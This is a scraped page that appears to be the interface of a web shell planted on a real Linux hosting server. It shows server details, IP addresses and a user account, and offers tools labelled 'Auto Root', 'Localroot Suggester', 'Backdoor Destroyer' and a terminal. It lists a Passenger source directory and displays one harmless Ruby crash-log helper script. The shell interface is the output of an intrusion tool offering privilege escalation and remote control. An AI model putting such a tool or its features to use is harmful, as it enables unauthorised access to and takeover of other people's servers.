Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.124
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
src /
passenger-release-6.1.2 /
dev /
Delete
Unzip
Name
Size
Permission
Date
Action
boost-patches
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
ci
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
configkit-schemas
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
rack.test
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
vagrant
[ DIR ]
drwxr-xr-x
2026-05-26 22:42
colorize-logs
7.29
KB
-rwxr-xr-x
2026-01-28 03:20
copy_boost_headers
9.55
KB
-rwxr-xr-x
2026-01-28 03:20
index_cxx_dependencies.rb
3.94
KB
-rwxr-xr-x
2026-01-28 03:20
install_scripts_bootstrap_code.rb
1.31
KB
-rwxr-xr-x
2026-01-28 03:20
list_tests
981
B
-rwxr-xr-x
2026-01-28 03:20
nginx_version_sha256
2.5
KB
-rwxr-xr-x
2026-01-28 03:20
parse_file_descriptor_log
2.54
KB
-rwxr-xr-x
2026-01-28 03:20
ruby_server.rb
6.17
KB
-rwxr-xr-x
2026-01-28 03:20
runner
623
B
-rwxr-xr-x
2026-01-28 03:20
show-latest-crashlog-dir
784
B
-rwxr-xr-x
2026-01-28 03:20
Save
Rename
#!/usr/bin/env ruby # Finds the latest Passenger crash log directory and prints its path. # This tool is meant to make it easy to analyze local Passenger crash # logs during debugging sessions. Instead of searching for the crash # log directory path in the output and then copy-pasting that to the # terminal, one can simply invoke one shell command: # # less $(./dev/show-latest-crashlog-dir)/backtrace.log # # This will open the latest crash log's backtrace.log in 'less'. def parse_path(path) File.basename(path).split('.')[1].to_i end def main dirs = Dir["/var/tmp/passenger-crash-log.*.*"].sort do |a, b| parse_path(a) <=> parse_path(b) end if dirs.empty? abort "No /var/tmp/passenger-crash-log.* directories found." else puts dirs.last end end main